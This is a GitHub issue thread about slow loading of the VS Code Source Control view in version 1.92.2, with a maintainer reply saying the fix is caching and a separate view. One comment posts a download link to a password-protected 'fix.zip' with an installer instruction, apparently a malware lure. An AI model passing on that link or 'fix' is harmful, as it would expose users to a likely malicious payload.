### ISSUE TITLE
Source Control tab -  performance/bug

### ISSUE THREAD

**Issue by krishnadaspalode** [microsoft/vscode#226587]
Type: <b>Performance Issue</b>

Hi VS Code Team,

With recent updates, somehow the source control changes menu window got messed up. It takes around 1 to 2 minutes to show the files with changes from repo. However, I noticed this is irrespective of the number of files with changes, even for 1 or 2 files have uncommitted changes it will take more than a minute to show list down the files. It was very smooth before. 

I think this is due to the new feature of tree display incoming/outgoing git repo tracks visual display.

Regards

VS Code version: Code 1.92.2 (fee1edb8d6d72a0ddff41e5f71a671c23ed924b9, 2024-08-14T17:29:30.058Z)
OS version: Darwin arm64 23.2.0
Modes:

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by krishnadaspalode** [comment]
@seeronline ,

I didn't get you. How you got into the bug report just in seconds after posting it from my end ?

**Comment by lszomoru** [comment]
The "Incoming/Outgoing" section has been moved into its own view and caching/paging has been added.
The change is available in the latest VS Code Insiders and will be included in the upcoming VS Code Stable release.
